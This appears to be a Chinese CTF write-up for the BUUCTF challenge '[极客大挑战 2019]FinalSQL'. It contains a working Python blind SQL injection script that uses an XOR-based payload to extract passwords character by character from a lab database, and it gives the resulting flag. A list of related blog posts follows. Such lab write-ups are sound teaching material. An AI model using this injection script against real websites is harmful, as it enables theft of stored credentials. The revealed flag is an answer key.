[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
还是做不到嘛\.5 小时前
Dvwa靶场-SQL Injection
数据库·sql·web安全
LlNingyu7 小时前
文艺复兴,什么是XSS,常见形式(一)
前端·安全·web安全·xss
lifewange9 小时前
SQL 中 IN 和 AND 可以搭配使用么?
数据库·sql
lzhdim11 小时前
SQL 入门 7:SQL 聚合与分组:函数、GROUP BY 与 ROLLUP
java·服务器·数据库·sql·mysql
lifewange11 小时前
INSERT INTO ... SELECT ...
数据库·sql
Uso_Magic11 小时前
SQLSERVER__EXPLAIN 常用分析案例。
服务器·数据库·sql
轻抚酸~14 小时前
403-Bypass(学习记录)
学习·web安全
程序员夏末16 小时前
【MySQL | 第二篇】 MVCC的底层实现(多版本并发控制)
数据库·sql·mysql
xcLeigh16 小时前
Oracle 迁移深度复盘:多数据库选型决策全解析
大数据·数据库·sql·oracle·数据迁移·数据管理
蓝黑202017 小时前
把数据库表里两列的值互换
数据库·sql·mysql